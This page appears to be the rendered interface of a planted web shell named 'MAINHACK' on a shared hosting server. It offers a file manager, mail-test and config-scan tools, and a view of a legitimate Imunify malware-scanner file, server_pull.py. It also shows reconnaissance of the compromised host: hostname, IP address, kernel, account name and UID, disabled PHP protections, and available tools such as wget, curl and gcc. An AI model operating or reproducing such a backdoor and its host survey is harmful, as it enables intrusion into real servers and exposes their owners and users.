[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: server_pull.py
File is not writable. Editing disabled.
""" This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Copyright © 2019 Cloud Linux Software Inc. This software is also available under ImunifyAV commercial license, see <https://www.imunify360.com/legal/eula> """ import hashlib import logging import os from pathlib import Path import tempfile from contextlib import ExitStack from defence360agent import utils from defence360agent.contracts.config import Core from defence360agent.contracts.messages import MessageType from defence360agent.contracts.plugins import MessageSink, expect from defence360agent.utils import Scope from imav.malwarelib.utils import malware_response logger = logging.getLogger(__name__) class ServerPullFileSender(MessageSink): SCOPE = Scope.IM360 loop = None async def create_sink(self, loop): self.loop = loop @expect(MessageType.MalwareSendFiles) async def upload_files(self, message): reason = message["reason"] for file in message["files"]: try: with ExitStack() as stack: # Save directory contents into tempfile and upload it to MRS if os.path.isdir(file): tf = stack.enter_context( tempfile.NamedTemporaryFile(dir=Core.TMPDIR) ) tf.write(await utils.check_run(["ls", "-al", file])) tf.seek(0) file = malware_response.MalwareHitPath(tf.name, file) hash_ = hashlib.sha256( Path(tf.name).read_bytes() ).hexdigest() logger.info( "Uploading temporary file %s with hash: %s", tf.name, hash_, ) await malware_response.upload_file( file, upload_reason=reason ) except Exception as e: logger.warning(str(e))
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium707.web-hosting.com
Server IP: 198.177.120.115
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium707.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.32 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: urbaoubp
User ID (UID): 1252
Group ID (GID): 1257
Script Owner UID: 1252
Current Dir Owner: N/A